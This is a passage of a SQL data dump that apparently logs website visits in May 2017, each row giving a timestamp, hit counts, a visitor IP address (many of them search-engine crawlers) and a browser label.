0,'217.182.132.94','other'),(105802,1493756344,1,1,0,0,'217.182.132.27','other'),(105803,1493756401,1,1,0,0,'164.132.161.35','other'),(105804,1493757632,1,1,0,0,'217.182.132.63','other'),(105805,1493757892,1,1,0,0,'164.132.161.50','other'),(105806,1493757925,1,1,0,0,'51.255.65.77','other'),(105807,1493757941,1,0,1,0,'66.249.66.183',''),(105808,1493757986,2,0,2,0,'66.249.76.27',''),(105809,1493758031,1,0,1,0,'66.249.76.28',''),(105810,1493758101,1,1,0,0,'51.255.71.113','other'),(105811,1493758362,1,0,1,0,'66.249.76.29',''),(105812,1493758425,1,1,0,0,'137.74.207.110','other'),(105813,1493759331,1,0,1,0,'68.180.231.24',''),(105814,1493759877,1,1,0,0,'164.132.161.57','other'),(105815,1493760233,1,1,0,0,'95.108.213.34','other'),(105816,1493760234,1,1,0,0,'178.154.200.45','other'),(105817,1493760468,1,1,0,0,'164.132.161.12','other'),(105818,1493760595,1,1,0,0,'164.132.161.79','other'),(105819,1493760844,1,1,0,0,'164.132.161.61','other'),(105820,1493761148,1,1,0,0,'51.255.65.57','other'),(105821,1493761173,1,1,0,0,'137.74.207.161','other'),(105822,1493761367,1,1,0,0,'164.132.161.29','other'),(105823,1493761471,1,1,0,0,'51.255.71.123','other'),(105824,1493761884,1,1,0,0,'51.255.65.7','other'),(105825,1493763300,1,1,0,0,'217.182.132.24','other'),(105826,1493763859,1,1,0,0,'164.132.161.10','other'),(105827,1493763921,1,1,0,0,'217.182.132.173','other'),(105828,1493764082,1,1,0,0,'141.8.142.154','other'),(105829,1493764083,1,1,0,0,'51.255.65.60','other'),(105830,1493764380,1,1,0,0,'164.132.162.153','other'),(105831,1493764814,1,1,0,0,'217.182.132.83','other'),(105832,1493765011,1,1,0,0,'217.182.132.156','other'),(105833,1493765537,1,1,0,0,'164.132.161.77','other'),(105834,1493765686,2,2,0,0,'164.132.161.51','other'),(105835,1493765992,1,1,0,0,'8.29.198.27','other'),(105836,1493766168,1,1,0,0,'217.182.132.152','other'),(105837,1493766618,1,1,0,0,'217.69.133.229','other'),(105838,1493766666,1,1,0,0,'164.132.161.90','other'),(105839,1493767129,1,1,0,0,'51.255.65.65','other'),(105840,1493767456,1,1,0,0,'40.77.167.30','other'),(105841,1493768496,1,1,0,0,'217.182.132.37','other'),(105842,1493769342,1,1,0,0,'164.132.161.94','other'),(105843,1493769915,1,1,0,0,'178.137.83.79','chrome'),(105844,1493770574,1,1,0,0,'178.154.189.3','other'),(105845,1493770577,1,1,0,0,'95.108.179.21','other'),(105846,1493771951,1,0,1,0,'66.249.76.109',''),(105847,1493772472,2,0,2,0,'66.249.66.84',''),(105848,1493772501,1,1,0,0,'51.255.65.92','other'),(105849,1493772734,1,1,0,0,'217.182.132.85','other'),(105850,1493773193,1,1,0,0,'51.255.71.113','other'),(105851,1493773625,1,1,0,0,'51.255.71.133','other'),(105852,1493774361,1,1,0,0,'216.244.66.237','other'),(105853,1493774472,1,1,0,0,'180.76.15.140','other'),(105854,1493774473,1,1,0,0,'180.76.15.138','other'),(105855,1493774848,1,1,0,0,'164.132.162.187','other'),(105856,1493774986,1,0,1,0,'66.249.76.28',''),(105857,1493775713,1,1,0,0,'51.255.71.121','other'),(105858,1493776159,1,1,0,0,'141.8.132.39','other'),(105859,1493776300,1,1,0,0,'141.8.183.1','other'),(105860,1493776502,1,1,0,0,'217.182.132.16','other'),(105861,1493776829,1,1,0,0,'8.29.198.25','other'),(105862,1493776906,1,0,1,0,'66.249.66.183',''),(105863,1493776941,1,0,1,0,'66.249.76.28',''),(105864,1493777110,1,1,0,0,'51.255.65.12','other'),(105865,1493777183,1,1,0,0,'164.132.161.31','other'),(105866,1493777267,1,0,1,0,'66.249.66.81',''),(105867,1493777878,1,1,0,0,'46.211.159.251','chrome'),(105868,1493778459,1,0,1,0,'68.180.228.49',''),(105870,1493778538,1,1,0,0,'217.182.132.32','other'),(105871,1493778549,1,1,0,0,'51.255.65.12','other'),(105872,1493779258,1,1,0,0,'51.255.65.19','other'),(105873,1493779652,1,1,0,0,'164.132.161.44','other'),(105874,1493780294,1,1,0,0,'217.182.132.76','other'),(105875,1493780567,1,1,0,0,'164.132.161.11','other'),(105876,1493780644,1,1,0,0,'51.255.65.89','other'),(105877,1493780683,1,1,0,0,'217.69.133.219','other'),(105878,1493780843,1,1,0,0,'217.182.132.74','other'),(105879,1493781304,1,1,0,0,'217.182.132.93','other'),(105880,1493781504,1,0,1,0,'66.249.66.177',''),(105881,1493781593,1,1,0,0,'217.182.132.73','other'),(105882,1493781902,1,1,0,0,'40.77.167.30','other'),(105883,1493782272,2,2,0,0,'217.69.134.178','other'),(105884,1493782536,1,1,0,0,'51.255.71.123','other'),(105885,1493782613,2,2,0,0,'95.108.213.34','other'),(105886,1493782737,1,1,0,0,'164.132.161.95','other'),(105887,1493782818,1,1,0,0,'51.255.71.122','other'),(105888,1493783151,1,0,1,0,'66.249.76.28',''),(105889,1493783455,1,1,0,0,'51.255.65.61','other'),(105890,1493783555,1,1,0,0,'217.69.133.251','other'),(105891,1493783806,1,1,0,0,'217.182.132.73','other'),(105892,1493783967,1,1,0,0,'216.244.66.237','other'),(105893,1493784312,1,1,0,0,'51.255.71.128','other'),(105894,1493784933,1,0,1,0,'66.249.66.81',''),(105895,1493785195,1,1,0,0,'51.255.65.12','other'),(105896,1493785403,1,1,0,0,'217.182.132.16','other'),(105897,1493785764,1,1,0,0,'180.76.15.142','other'),(105898,1493785802,1,1,0,0,'217.182.132.63','other'),(105899,1493785850,1,1,0,0,'217.182.132.241','other'),(105900,1493786032,1,1,0,0,'216.244.66.237','other'),(105901,1493786172,1,1,0,0,'164.132.161.20','other'),(105902,1493786391,1,0,1,0,'66.249.66.180',''),(105903,1493786627,1,1,0,0,'51.255.65.65','other'),(105904,1493786779,1,1,0,0,'91.196.178.67','firefox'),(105905,1493787346,1,0,1,0,'68.180.228.49',''),(105906,1493787655,1,1,0,0,'8.29.198.27','other'),(105907,1493787944,1,1,0,0,'91.196.178.68','firefox'),(105908,1493788254,1,1,0,0,'51.255.65.36','other'),(105909,1493788322,1,1,0,0,'217.182.132.172','other'),(105910,1493788977,1,0,1,0,'66.249.76.109',''),(105911,1493788980,1,1,0,0,'217.182.132.17','other'),(105912,1493789128,1,0,1,0,'66.249.76.27',''),(105913,1493789296,1,1,0,0,'217.182.132.34','other'),(105914,1493789407,1,1,0,0,'51.255.71.110','other'),(105915,1493789450,1,1,0,0,'217.69.133.222','other'),(105916,1493789525,1,1,0,0,'37.53.225.83','firefox'),(105917,1493790120,1,1,0,0,'51.255.65.37','other'),(105918,1493790358,1,0,1,0,'66.249.76.28',''),(105919,1493790935,1,1,0,0,'164.132.161.83','other'),(105920,1493791754,1,1,0,0,'91.196.178.71','chrome'),(105921,1493791859,1,1,0,0,'51.255.65.9','other'),(105922,1493792180,1,1,0,0,'178.154.200.37','other'),(105923,1493792372,1,1,0,0,'216.244.66.237','other'),(105924,1493792392,1,0,1,0,'66.249.76.28',''),(105925,1493792675,1,1,0,0,'91.196.178.71','chrome'),(105926,1493792836,1,1,0,0,'164.132.161.16','other'),(105927,1493793271,1,1,0,0,'66.249.76.109','chrome'),(105928,1493793366,1,1,0,0,'91.196.178.65','firefox'),(105929,1493793628,1,1,0,0,'217.182.132.55','other'),(105930,1493794216,1,0,1,0,'66.249.76.108',''),(105931,1493794246,1,1,0,0,'51.255.65.57','other'),(105932,1493795105,1,1,0,0,'217.69.133.68','other'),(105933,1493795348,1,1,0,0,'217.182.132.151','other'),(105934,1493795420,1,1,0,0,'130.180.220.15','firefox'),(105935,1493795907,1,0,1,0,'66.249.76.28',''),(105936,1493795986,1,1,0,0,'91.196.177.46','chrome'),(105937,1493796097,1,1,0,0,'217.69.133.224','other'),(105938,1493796243,1,1,0,0,'178.154.189.3','other'),(105939,1493796257,2,2,0,0,'91.196.178.65','firefox'),(105940,1493796359,1,1,0,0,'164.132.161.59','other'),(105941,1493796554,2,2,0,0,'95.108.179.15','other'),(105942,1493796577,2,2,0,0,'141.8.142.154','other'),(105943,1493796612,1,1,0,0,'178.154.200.2','other'),(105944,1493796653,1,1,0,0,'95.108.213.34','other'),(105945,1493796665,1,1,0,0,'5.255.253.63','other'),(105946,1493797112,1,1,0,0,'51.255.65.83','other'),(105947,1493797223,1,1,0,0,'78.111.186.185','chrome'),(105948,1493797227,2,2,0,0,'91.196.178.68','chrome'),(105949,1493797269,1,1,0,0,'62.80.169.116','chrome'),(105950,1493797577,1,1,0,0,'51.255.64.106','other'),(105951,1493797722,1,1,0,0,'91.196.178.163','chrome'),(105952,1493797794,2,2,0,0,'216.244.66.237','other'),(105953,1493797907,1,1,0,0,'107.167.108.63','chrome'),(105954,1493798004,1,1,0,0,'37.52.22.152','chrome'),(105955,1493798054,1,1,0,0,'91.196.178.67','firefox'),(105956,1493798055,1,1,0,0,'92.113.25.41','chrome'),(105957,1493798079,1,1,0,0,'141.8.142.15','other'),(105958,1493798315,1,1,0,0,'91.196.177.15','chrome'),(105959,1493798475,1,1,0,0,'8.29.198.25','other'),(105960,1493798556,1,1,0,0,'51.255.65.90','other'),(105961,1493798734,1,1,0,0,'157.55.39.142','other'),(105962,1493799018,1,1,0,0,'51.255.65.33','other'),(105963,1493799049,1,1,0,0,'51.255.65.37','other'),(105964,1493799099,1,1,0,0,'40.77.167.55','other'),(105965,1493799174,3,3,0,0,'95.108.213.34','other'),(105966,1493799178,1,1,0,0,'95.108.179.15','other'),(105967,1493799209,2,2,0,0,'31.43.29.130','chrome'),(105968,1493799363,3,3,0,0,'91.196.178.68','chrome'),(105969,1493799795,1,1,0,0,'216.244.66.237','other'),(105970,1493800011,1,1,0,0,'195.182.22.45','chrome'),(105971,1493800176,1,1,0,0,'217.69.133.13','other'),(105972,1493800260,1,1,0,0,'51.255.65.22','other'),(105973,1493800618,1,1,0,0,'141.8.142.42','other'),(105974,1493800622,1,1,0,0,'178.154.189.14','other'),(105975,1493800854,1,0,1,0,'66.249.76.109',''),(105976,1493801244,1,1,0,0,'176.38.47.48','firefox'),(105977,1493801360,1,1,0,0,'66.249.76.29','chrome'),(105978,1493801427,1,0,1,0,'66.249.76.107',''),(105979,1493801816,1,1,0,0,'217.182.132.71','other'),(105980,1493801877,1,1,0,0,'164.132.161.19','other'),(105981,1493801881,3,3,0,0,'91.196.178.68','firefox'),(105982,1493801913,1,1,0,0,'91.196.178.68','opera'),(105983,1493801988,1,1,0,0,'51.255.71.121','other'),(105984,1493802710,1,1,0,0,'217.182.132.187','other'),(105985,1493802838,1,1,0,0,'217.69.135.93','other'),(105986,1493802935,1,0,1,0,'66.249.76.27',''),(105987,1493802943,1,1,0,0,'217.69.134.182','other'),(105988,1493803227,1,1,0,0,'93.74.212.147','firefox'),(105989,1493803269,1,1,0,0,'109.227.110.11','chrome'),(105990,1493803288,1,1,0,0,'137.74.207.159','other'),(105991,1493803902,1,1,0,0,'95.132.49.24','chrome'),(105992,1493804133,1,1,0,0,'164.132.161.90','other'),(105993,1493804300,1,1,0,0,'91.196.177.118','chrome'),(105994,1493804336,1,1,0,0,'51.255.65.18','other'),(105995,1493804681,1,1,0,0,'195.78.58.12','chrome'),(105996,1493804849,1,1,0,0,'107.21.1.8','other'),(105997,1493804859,1,0,1,0,'66.249.76.28',''),(105998,1493804891,1,0,1,0,'66.249.76.108',''),(105999,1493805452,1,1,0,0,'217.69.133.72','other'),(106000,1493805575,1,1,0,0,'217.69.135.91','other'),(106001,1493805645,1,1,0,0,'217.69.134.155','other'),(106002,1493805668,1,1,0,0,'217.69.134.188','other'),(106003,1493805768,1,1,0,0,'195.78.58.12','chrome'),(106004,1493806166,1,1,0,0,'217.182.132.150','other'),(106005,1493806476,1,1,0,0,'40.77.167.10','other'),(106006,1493807253,1,1,0,0,'51.255.65.70','other'),(106007,1493808048,1,1,0,0,'217.182.132.96','other'),(106008,1493808144,1,1,0,0,'164.132.162.153','other'),(106009,1493808254,1,1,0,0,'217.69.134.227','other'),(106010,1493808266,1,1,0,0,'217.69.134.178','other'),(106011,1493808553,1,1,0,0,'217.69.133.194','other'),(106012,1493808951,1,1,0,0,'83.149.126.98','other'),(106013,1493809150,1,1,0,0,'51.255.65.88','other'),(106014,1493809174,1,1,0,0,'217.182.132.150','other'),(106015,1493809301,1,1,0,0,'8.29.198.25','other'),(106016,1493809493,1,1,0,0,'217.182.132.32','other'),(106017,1493810134,2,2,0,0,'137.74.207.108','other'),(106018,1493810449,1,0,1,0,'66.249.76.27',''),(106019,1493810509,1,0,1,0,'66.249.66.177',''),(106020,1493810531,1,1,0,0,'164.132.161.46','other'),(106021,1493810618,1,1,0,0,'217.182.132.70','other'),(106022,1493810687,1,1,0,0,'217.69.133.233','other'),(106023,1493810731,1,1,0,0,'164.132.161.63','other'),(106024,1493811014,1,0,1,0,'66.249.76.107',''),(106025,1493811632,1,1,0,0,'217.182.132.28','other'),(106026,1493811693,1,1,0,0,'151.80.27.118','other'),(106027,1493811712,1,1,0,0,'164.132.161.32','other'),(106028,1493812182,1,1,0,0,'51.255.71.100','other'),(106029,1493812216,1,1,0,0,'176.112.10.4','chrome'),(106030,1493812557,1,1,0,0,'91.196.178.36','chrome'),(106031,1493812982,1,1,0,0,'217.69.133.67','other'),(106032,1493813352,1,1,0,0,'46.200.252.2','chrome'),(106033,1493813376,1,1,0,0,'51.255.65.73','other'),(106034,1493813594,1,1,0,0,'217.69.133.228','other'),(106035,1493814100,1,1,0,0,'217.69.133.220','other'),(106036,1493814509,1,1,0,0,'46.200.252.2','chrome'),(106037,1493814518,1,1,0,0,'216.244.66.237','other'),(106038,1493814547,1,0,1,0,'66.249.66.84',''),(106039,1493815234,1,1,0,0,'51.255.71.110','other'),(106040,1493815564,1,1,0,0,'217.182.132.52','other'),(106041,1493815633,1,1,0,0,'46.200.26.214','firefox'),(106042,1493815668,1,1,0,0,'164.132.161.10','other'),(106043,1493815679,1,1,0,0,'217.69.136.210','other'),(106044,1493815723,1,1,0,0,'217.182.132.192','other'),(106045,1493815892,1,1,0,0,'217.182.132.154','other'),(106046,1493816217,1,1,0,0,'46.174.242.228','chrome'),(106047,1493816337,1,1,0,0,'91.196.178.68','chrome'),(106048,1493816384,1,0,1,0,'66.249.66.180',''),(106049,1493816618,1,1,0,0,'95.132.18.118','firefox'),(106050,1493816878,1,1,0,0,'217.182.132.82','other'),(106051,1493817133,1,1,0,0,'164.132.161.67','other'),(106052,1493817323,1,1,0,0,'217.69.133.18','other'),(106053,1493817388,1,1,0,0,'217.182.132.178','other'),(106054,1493817574,1,1,0,0,'37.52.17.226','chrome'),(106055,1493817631,1,1,0,0,'91.196.178.67','firefox'),(106056,1493817798,1,1,0,0,'164.132.161.53','other'),(106057,1493818325,1,1,0,0,'92.112.104.162','chrome'),(106058,1493819169,1,1,0,0,'217.69.133.229','other'),(106059,1493819676,1,1,0,0,'164.132.161.18','other'),(106060,1493820126,1,1,0,0,'8.29.198.25','other'),(106061,1493820267,1,0,1,0,'66.249.76.109',''),(106062,1493820269,1,1,0,0,'217.182.132.173','other'),(106063,1493821357,1,1,0,0,'51.255.65.26','other'),(106064,1493821685,1,1,0,0,'91.196.178.66','firefox'),(106065,1493821742,1,1,0,0,'137.74.207.116','other'),(106066,1493821804,1,0,1,0,'66.249.76.27',''),(106067,1493821991,1,1,0,0,'51.255.71.118','other'),(106068,1493822358,1,1,0,0,'195.49.151.89','chrome'),(106069,1493822395,1,1,0,0,'164.132.161.95','other'),(106070,1493823303,1,1,0,0,'51.255.65.70','other'),(106071,1493823497,1,1,0,0,'66.249.76.108','chrome'),(106072,1493823518,1,1,0,0,'66.249.76.107','chrome'),(106073,1493823524,1,1,0,0,'95.28.166.159','msie'),(106074,1493823719,1,1,0,0,'66.249.76.109','chrome'),(106075,1493823817,1,1,0,0,'94.178.151.45','firefox'),(106076,1493823861,1,0,1,0,'66.249.76.28',''),(106077,1493823873,1,1,0,0,'217.182.132.78','other'),(106078,1493823953,1,0,1,0,'66.249.66.177',''),(106079,1493823971,1,1,0,0,'217.182.132.151','other'),(106080,1493823999,1,1,0,0,'217.182.132.241','other'),(106081,1493824446,1,1,0,0,'66.249.66.177','chrome'),(106082,1493824739,1,1,0,0,'217.182.132.150','other'),(106083,1493825599,1,1,0,0,'51.255.71.121','other'),(106084,1493826626,1,0,1,0,'66.249.76.28',''),(106085,1493826690,1,1,0,0,'217.69.133.193','other'),(106086,1493826986,1,1,0,0,'164.132.161.66','other'),(106087,1493827063,1,1,0,0,'217.182.132.190','other'),(106088,1493827715,1,1,0,0,'51.255.71.121','other'),(106089,1493827807,1,1,0,0,'51.255.65.90','other'),(106090,1493828337,1,1,0,0,'217.182.132.193','other'),(106091,1493829079,1,1,0,0,'164.132.162.155','other'),(106092,1493829565,1,1,0,0,'217.182.132.7','other'),(106093,1493829867,1,1,0,0,'51.255.65.70','other'),(106094,1493829925,1,1,0,0,'217.69.133.84','other'),(106095,1493830567,1,1,0,0,'217.182.132.153','other'),(106096,1493830662,1,1,0,0,'217.69.133.68','other'),(106097,1493830754,1,1,0,0,'217.182.132.23','other'),(106098,1493830953,1,1,0,0,'8.29.198.27','other'),(106099,1493831141,1,1,0,0,'217.69.133.215','other'),(106100,1493831527,1,1,0,0,'217.69.133.69','other'),(106101,1493831764,1,1,0,0,'217.182.132.19','other'),(106102,1493831814,1,0,1,0,'66.249.76.107',''),(106103,1493831979,1,1,0,0,'217.182.132.170','other'),(106104,1493832303,1,0,1,0,'66.249.76.108',''),(106105,1493832335,1,1,0,0,'217.182.132.180','other'),(106106,1493832437,1,1,0,0,'137.74.207.114','other'),(106107,1493832570,1,1,0,0,'164.132.161.41','other'),(106108,1493832601,1,0,1,0,'66.249.66.28',''),(106109,1493833115,1,1,0,0,'164.132.164.180','other'),(106110,1493833705,1,1,0,0,'164.132.161.76','other'),(106111,1493834237,1,0,1,0,'68.180.231.24',''),(106112,1493834487,1,1,0,0,'95.108.213.34','other'),(106113,1493835097,1,1,0,0,'92.113.191.169','chrome'),(106114,1493835125,1,1,0,0,'164.132.161.65','other'),(106115,1493835174,1,1,0,0,'164.132.161.96','other'),(106116,1493835310,1,0,1,0,'66.249.76.29',''),(106117,1493835346,1,0,1,0,'66.249.76.28',''),(106118,1493836100,1,1,0,0,'217.69.133.253','other'),(106119,1493836302,1,1,0,0,'217.182.132.14','other'),(106120,1493836326,1,1,0,0,'164.132.161.83','other'),(106121,1493836477,1,1,0,0,'164.132.161.68','other'),(106122,1493836499,1,0,1,0,'68.180.231.24',''),(106123,1493836516,1,1,0,0,'46.211.7.90','other'),(106124,1493836650,1,1,0,0,'217.69.133.242','other'),(106125,1493837022,1,0,1,0,'66.249.76.28',''),(106126,1493837204,1,0,1,0,'66.249.66.84',''),(106127,1493837543,1,1,0,0,'164.132.161.88','other'),(106128,1493837744,1,1,0,0,'164.132.161.12','other'),(106129,1493837979,1,1,0,0,'164.132.161.45','other'),(106130,1493838620,1,1,0,0,'188.163.16.136','chrome'),(106131,1493838706,1,1,0,0,'164.132.161.68','other'),(106132,1493838819,1,0,1,0,'66.249.76.28',''),(106133,1493838821,1,1,0,0,'217.182.132.69','other'),(106134,1493839473,1,1,0,0,'217.69.133.230','other'),(106135,1493839545,1,1,0,0,'91.196.178.40','chrome'),(106136,1493839650,2,2,0,0,'164.132.161.71','other'),(106137,1493839924,1,1,0,0,'217.182.132.34','other'),(106138,1493840101,1,1,0,0,'217.182.132.37','other'),(106139,1493840614,1,1,0,0,'217.182.132.66','other'),(106140,1493840716,1,0,1,0,'66.249.66.202',''),(106141,1493840987,1,1,0,0,'164.132.161.4','other'),(106142,1493841006,1,1,0,0,'217.69.133.216','other'),(106143,1493841781,1,1,0,0,'8.29.198.25','other'),(106144,1493842142,1,1,0,0,'164.132.161.65','other'),(106145,1493842353,1,1,0,0,'173.234.159.250','other'),(106146,1493842441,1,1,0,0,'91.196.178.129','chrome'),(106147,1493842456,1,1,0,0,'95.108.213.34','other'),(106148,1493842542,1,1,0,0,'164.132.161.39','other'),(106149,1493842574,1,0,1,0,'66.249.76.29',''),(106150,1493842860,1,1,0,0,'217.182.132.69','other'),(106151,1493843326,1,1,0,0,'91.209.11.236','other'),(106153,1493843814,1,1,0,0,'157.55.39.201','other'),(106154,1493844001,1,1,0,0,'217.182.132.84','other'),(106155,1493844029,1,1,0,0,'217.182.132.93','other'),(106156,1493844140,1,1,0,0,'164.132.161.64','other'),(106157,1493844431,1,0,1,0,'66.249.66.87',''),(106158,1493844464,1,1,0,0,'216.244.66.237','other'),(106159,1493844875,1,1,0,0,'66.249.76.109','chrome'),(106160,1493845427,1,1,0,0,'109.236.81.160','chrome'),(106161,1493845689,1,1,0,0,'51.255.71.112','other'),(106162,1493845695,1,1,0,0,'51.255.65.17','other'),(106163,1493846245,1,1,0,0,'217.69.133.9','other'),(106164,1493846250,1,1,0,0,'157.55.39.182','other'),(106165,1493846400,1,1,0,0,'164.132.161.75','other'),(106166,1493846604,1,1,0,0,'216.244.66.237','other'),(106167,1493846759,1,1,0,0,'217.182.132.19','other'),(106168,1493847315,1,1,0,0,'51.255.65.42','other'),(106169,1493847926,1,0,1,0,'68.180.231.24',''),(106170,1493847944,1,1,0,0,'217.182.132.178','other'),(106171,1493848716,1,0,1,0,'66.249.66.210',''),(106172,1493849324,1,1,0,0,'178.154.149.3','other'),(106173,1493849437,1,0,1,0,'66.249.76.27',''),(106174,1493850003,1,1,0,0,'217.182.132.188','other'),(106175,1493850036,1,1,0,0,'217.182.132.87','other'),(106176,1493850136,1,1,0,0,'51.255.65.49','other'),(106177,1493851300,1,1,0,0,'217.69.133.237','other'),(106178,1493851638,1,1,0,0,'217.182.132.153','other'),(106179,1493851777,1,1,0,0,'164.132.161.72','other'),(106180,1493852055,1,1,0,0,'217.182.132.191','other'),(106181,1493852113,1,1,0,0,'51.255.65.21','other'),(106182,1493852203,1,0,1,0,'66.249.76.27',''),(106183,1493852282,1,1,0,0,'217.182.132.91','other'),(106184,1493852340,1,1,0,0,'51.255.65.23','other'),(106185,1493852606,1,1,0,0,'8.29.198.25','other'),(106186,1493852629,1,1,0,0,'216.244.66.237','other'),(106187,1493852637,1,1,0,0,'164.132.161.24','other'),(106188,1493852748,1,1,0,0,'66.249.76.28','chrome'),(106189,1493854103,1,1,0,0,'217.182.132.23','other'),(106190,1493854300,1,1,0,0,'51.255.71.122','other'),(106191,1493854466,1,1,0,0,'137.74.207.164','other'),(106192,1493855009,1,1,0,0,'157.55.39.201','other'),(106193,1493855240,1,1,0,0,'51.255.65.15','other'),(106194,1493856095,1,1,0,0,'217.182.132.53','other'),(106195,1493857015,1,1,0,0,'164.132.162.156','other'),(106196,1493857149,1,1,0,0,'66.249.76.28','chrome'),(106197,1493857226,1,0,1,0,'68.180.231.24',''),(106198,1493857512,1,0,1,0,'68.180.228.49',''),(106199,1493857522,1,1,0,0,'217.182.132.61','other'),(106200,1493857716,1,1,0,0,'51.255.65.75','other'),(106201,1493858310,1,1,0,0,'217.69.136.204','other'),(106202,1493858494,1,1,0,0,'217.182.132.30','other'),(106203,1493858730,1,0,1,0,'66.249.76.109',''),(106204,1493859106,1,0,1,0,'66.249.76.107',''),(106205,1493859806,1,1,0,0,'217.69.133.215','other'),(106206,1493859814,1,1,0,0,'217.69.133.238','other'),(106207,1493859974,1,1,0,0,'217.182.132.190','other'),(106208,1493860008,1,1,0,0,'51.255.71.119','other'),(106209,1493860065,1,1,0,0,'180.76.15.6','other'),(106210,1493860070,1,1,0,0,'217.182.132.84','other'),(106211,1493860106,1,1,0,0,'164.132.162.156','other'),(106212,1493860158,1,0,1,0,'68.180.228.49',''),(106213,1493860379,1,0,1,0,'66.249.76.27',''),(106214,1493860412,1,1,0,0,'51.255.65.36','other'),(106215,1493860499,1,0,1,0,'66.249.76.28',''),(106216,1493860646,1,1,0,0,'217.182.132.18','other'),(106217,1493860985,1,1,0,0,'217.182.132.31','other'),(106218,1493861336,1,1,0,0,'51.255.71.133','other'),(106219,1493862244,1,1,0,0,'164.132.161.19','other'),(106220,1493862562,1,1,0,0,'51.255.65.79','other'),(106221,1493862684,1,1,0,0,'217.182.132.55','other'),(106222,1493862979,1,1,0,0,'217.69.133.68','other'),(106223,1493863288,1,1,0,0,'217.182.132.193','other'),(106224,1493863433,1,1,0,0,'8.29.198.27','other'),(106225,1493863551,1,1,0,0,'157.55.39.201','other'),(106226,1493863571,1,1,0,0,'51.255.65.66','other'),(106227,1493864049,1,1,0,0,'217.69.133.231','other'),(106228,1493864073,1,1,0,0,'180.76.15.9','other'),(106229,1493864328,1,1,0,0,'217.182.132.240','other'),(106230,1493864390,1,1,0,0,'217.182.132.94','other'),(106231,1493864513,1,1,0,0,'217.69.133.219','other'),(106232,1493865927,1,1,0,0,'40.77.167.55','other'),(106233,1493866018,1,0,1,0,'66.249.69.20',''),(106234,1493866184,1,1,0,0,'217.182.132.22','other'),(106235,1493866517,1,1,0,0,'164.132.161.47','other'),(106236,1493866711,1,1,0,0,'216.244.66.237','other'),(106237,1493867391,1,1,0,0,'164.132.162.159','other'),(106238,1493867426,1,0,1,0,'66.249.69.69',''),(106239,1493867843,1,1,0,0,'51.255.65.16','other'),(106240,1493868191,1,1,0,0,'217.182.132.170','other'),(106241,1493868241,1,1,0,0,'217.182.132.184','other'),(106242,1493868285,1,1,0,0,'164.132.161.73','other'),(106243,1493868658,1,1,0,0,'216.244.66.237','other'),(106244,1493869281,1,1,0,0,'178.154.200.64','other'),(106245,1493869286,1,1,0,0,'95.108.179.21','other'),(106246,1493869291,1,1,0,0,'141.8.132.72','other'),(106247,1493869464,1,1,0,0,'217.182.132.15','other'),(106248,1493869563,1,1,0,0,'217.69.133.229','other'),(106249,1493869611,1,1,0,0,'66.249.69.24','chrome'),(106250,1493869662,1,1,0,0,'164.132.161.4','other'),(106251,1493869847,1,1,0,0,'51.255.65.42','other'),(106252,1493870175,1,1,0,0,'91.196.178.69','other'),(106253,1493870508,1,1,0,0,'51.255.65.91','other'),(106254,1493870541,1,1,0,0,'164.132.161.37','other'),(106255,1493870683,1,1,0,0,'164.132.161.96','other'),(106256,1493871277,1,1,0,0,'95.108.213.34','other'),(106257,1493871554,1,1,0,0,'51.255.65.89','other'),(106258,1493871646,1,1,0,0,'51.255.65.4','other'),(106259,1493871860,1,1,0,0,'164.132.162.157','other'),(106260,1493872156,1,1,0,0,'217.69.133.223','other'),(106261,1493872490,1,1,0,0,'89.178.92.49','msie'),(106262,1493873079,1,1,0,0,'164.132.161.76','other'),(106263,1493873081,2,1,1,0,'66.249.69.74',''),(106264,1493873230,1,1,0,0,'216.244.66.237','other'),(106265,1493873291,1,1,0,0,'217.182.132.78','other'),(106266,1493873415,1,1,0,0,'164.132.161.87','other'),(106267,1493873420,1,1,0,0,'217.69.133.217','other'),(106268,1493873753,1,1,0,0,'217.182.132.33','other'),(106269,1493873819,1,1,0,0,'217.182.132.157','other'),(106270,1493873958,1,1,0,0,'40.77.167.55','other'),(106271,1493874131,1,1,0,0,'51.255.65.12','other'),(106272,1493874157,1,1,0,0,'164.132.161.61','other'),(106273,1493874261,1,1,0,0,'8.29.198.27','other'),(106274,1493874769,1,1,0,0,'217.69.133.194','other'),(106275,1493874771,1,1,0,0,'217.69.133.5','other'),(106276,1493874994,1,1,0,0,'66.102.9.27','chrome'),(106277,1493875093,1,0,1,0,'66.249.69.20',''),(106278,1493875134,1,0,1,0,'66.249.69.16',''),(106279,1493875236,1,1,0,0,'164.132.161.36','other'),(106280,1493875457,1,1,0,0,'217.182.132.68','other'),(106281,1493875474,1,1,0,0,'51.255.65.13','other'),(106282,1493875840,1,1,0,0,'91.196.178.68','chrome'),(106283,1493876218,1,1,0,0,'217.69.133.217','other'),(106284,1493876251,1,1,0,0,'164.132.161.8','other'),(106285,1493876732,1,1,0,0,'217.69.136.206','other'),(106286,1493876959,1,1,0,0,'217.182.132.181','other'),(106287,1493877311,1,0,1,0,'66.249.69.20',''),(106288,1493877652,1,1,0,0,'51.255.71.133','other'),(106289,1493877905,1,1,0,0,'217.69.133.226','other'),(106290,1493878243,1,1,0,0,'217.182.132.151','other'),(106291,1493878364,1,1,0,0,'91.196.178.65','chrome'),(106292,1493878601,1,1,0,0,'37.55.151.61','firefox'),(106293,1493878917,1,1,0,0,'91.196.178.71','chrome'),(106294,1493879164,1,1,0,0,'164.132.161.94','other'),(106295,1493879216,1,1,0,0,'164.132.162.164','other'),(106296,1493879584,1,1,0,0,'217.182.132.170','other'),(106297,1493880045,1,1,0,0,'164.132.161.77','other'),(106298,1493880103,1,1,0,0,'62.212.73.211','other'),(106299,1493880377,1,1,0,0,'95.132.28.85','firefox'),(106300,1493880621,1,1,0,0,'217.69.133.223','other'),(106301,1493880812,1,1,0,0,'51.255.71.118','other'),(106302,1493880871,1,1,0,0,'217.182.132.88','other'),(106303,1493880908,1,1,0,0,'164.132.161.47','other'),(106304,1493881109,1,1,0,0,'66.249.69.107','chrome'),(106305,1493881162,1,1,0,0,'216.244.66.237','other'),(106306,1493881408,1,1,0,0,'217.182.132.186','other'),(106307,1493881500,1,1,0,0,'91.196.178.70','chrome'),(106308,1493882550,1,1,0,0,'91.196.178.70','firefox'),(106309,1493883278,1,1,0,0,'91.196.178.70','chrome'),(106310,1493884068,3,3,0,0,'95.108.179.15','other'),(106311,1493884097,1,1,0,0,'5.255.253.63','other'),(106312,1493884141,1,1,0,0,'95.108.213.34','other'),(106313,1493884520,1,1,0,0,'217.182.132.188','other'),(106314,1493884545,1,1,0,0,'51.255.65.83','other'),(106315,1493884596,1,1,0,0,'51.255.65.33','other'),(106316,1493885083,1,1,0,0,'8.29.198.26','other'),(106317,1493885474,1,1,0,0,'91.196.178.68','chrome'),(10631